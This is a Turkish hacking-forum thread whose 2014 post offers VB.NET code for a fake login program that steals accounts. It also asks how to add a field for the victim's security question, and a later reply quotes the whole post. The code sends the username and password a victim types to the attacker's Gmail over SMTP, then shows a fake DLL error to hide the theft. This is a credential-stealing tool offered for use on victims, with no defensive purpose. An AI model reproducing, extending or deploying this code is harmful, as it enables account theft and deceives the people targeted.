Fake Programlar Hesap Çalma programı kodları

10 Tem 2014
207
0
Balıkesir
Selamun aleykum THT Ailesi herkesin bildiği keyloggerin kök kodlarıyla (kendim verdim ismini :D) bir program yapılıyor basit bir arayüz örnek olarak E-Posta Şifre gibi veya ID PW aynı şeyler anlayacağınız hesap arayüzleri peki bu programın özelliği ne bu arayüzde giriş ekranı ve birde buton var bildiğimiz, kurban ornek olarak hesabını gırdı ..... [USER=116876]hotmail[/USER].com efe123123123 boyle bir hesabı vardıyelım ve gırdı butona bastıgı anda Eposta ve şifresi programa kaydettiğiniz gmail adresinize geliyor program mantığı bu kodlarını en altta paylaşacam ama burdaki amacım böyle bir program sunmak değil THT de zaten cok konu açılmış bu konu üzerine. şimdi konunun ortasında arayüzden bahsettik değilmi bu arayüzde ne vardı E posta şifre ve buton yazan kavramlar e postayı gırersın şifreyi girersin butona basarsın ve güm hesap gmailinde benim sorum şu kurban epostayı gırse şifreyi girse bi de güvenlik sorusunu gırse sonra butona bassa daha doğrusu 3. bir textbox kodunu kim yapabilir anlatabilmişimdir umarım buyurun programımızın kodları​
Kod:
If TextBox1.Text = "" Then
MsgBox("Kullanıcı Adı Yanlış")
If TextBox2.Text = "" Then
MsgBox("Şifre Yanlış")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("gmail adresiniz", "şifreniz")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("gmail adresiniz")
mail.To.Add("gmail adresiniz")
mail.Subject = "Username : " & TextBox1.Text
mail.Body = "Password : " & TextBox2.Text & ","
smtpServer.Send(mail)
MsgBox("Belirtilen modül yada değişken bulunamadı MSVC32.dll")
MsgBox("Hata Kodu:3454325")

Moderatör tarafında düzenlendi:

TurkGokay

Uzman üye
4 Ara 2022
1,020
544
Kemalizm
Selamun aleykum THT Ailesi herkesin bildiği keyloggerin kök kodlarıyla (kendim verdim ismini :D) bir program yapılıyor basit bir arayüz örnek olarak E-Posta Şifre gibi veya ID PW aynı şeyler anlayacağınız hesap arayüzleri peki bu programın özelliği ne bu arayüzde giriş ekranı ve birde buton var bildiğimiz, kurban ornek olarak hesabını gırdı ..... hotmail.com efe123123123 boyle bir hesabı vardıyelım ve gırdı butona bastıgı anda Eposta ve şifresi programa kaydettiğiniz gmail adresinize geliyor program mantığı bu kodlarını en altta paylaşacam ama burdaki amacım böyle bir program sunmak değil THT de zaten cok konu açılmış bu konu üzerine. şimdi konunun ortasında arayüzden bahsettik değilmi bu arayüzde ne vardı E posta şifre ve buton yazan kavramlar e postayı gırersın şifreyi girersin butona basarsın ve güm hesap gmailinde benim sorum şu kurban epostayı gırse şifreyi girse bi de güvenlik sorusunu gırse sonra butona bassa daha doğrusu 3. bir textbox kodunu kim yapabilir anlatabilmişimdir umarım buyurun programımızın kodları
Kod:
If TextBox1.Text = "" Then
MsgBox("Kullanıcı Adı Yanlış")
If TextBox2.Text = "" Then
MsgBox("Şifre Yanlış")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("gmail adresiniz", "şifreniz")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("gmail adresiniz")
mail.To.Add("gmail adresiniz")
mail.Subject = "Username : " & TextBox1.Text
mail.Body = "Password : " & TextBox2.Text & ","
smtpServer.Send(mail)
MsgBox("Belirtilen modül yada değişken bulunamadı MSVC32.dll")
MsgBox("Hata Kodu:3454325")
Eline sağlık fakat çalışacağını düşünmüyorum.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.